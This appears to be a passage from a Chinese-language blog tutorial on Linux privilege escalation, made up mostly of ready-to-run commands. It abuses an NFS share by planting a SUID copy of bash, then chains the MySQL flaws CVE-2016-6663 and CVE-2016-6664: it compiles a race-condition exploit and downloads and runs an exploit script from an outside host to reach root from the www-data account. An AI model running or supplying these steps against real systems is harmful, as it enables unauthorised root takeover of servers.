本文详细介绍了Linux系统中通过挂载NFS共享目录实现提权的方法,包括创建本地挂载点,设置权限,并利用shell脚本增强权限。接着,文章探讨了MySQL的提权技巧,特别是针对CVE-2016-6663和CVE-2016-6664两个漏洞的利用,阐述如何从www-data权限提升到mysql权限,再进一步提升到root权限的过程。
sudo showmount -e 10.1.1.233
(2)创建本地挂载目录,挂载共享目录。使用
sudo mkdir -p /tmp/data
sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data
cp /bin/bash /tmp/data/shell
chmod u+s /tmp/data/shell
(3)回到要提权的服务器上,使用普通用户使用-p参数来获取root权限。
6、MySQL提权
MySQL提权方式有UDF提权,MOF提权,写入启动项提权等方式,但比较有意思的是CVE-2016-6663、CVE-2016-6664组合利用的提取场景,可以将一个www-data权限提升到root权限。
(1)利用CVE-2016-6663将www-data权限提升为mysql权限:
cd /var/www/html/
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
./mysql-privesc-race test 123456 localhost testdb
(2)利用CVE-2016-6664将Mysql权限提升为root权限:
wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
chmod 777 mysql-chowned.sh
./mysql-chowned.sh /var/log/mysql/error.log
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
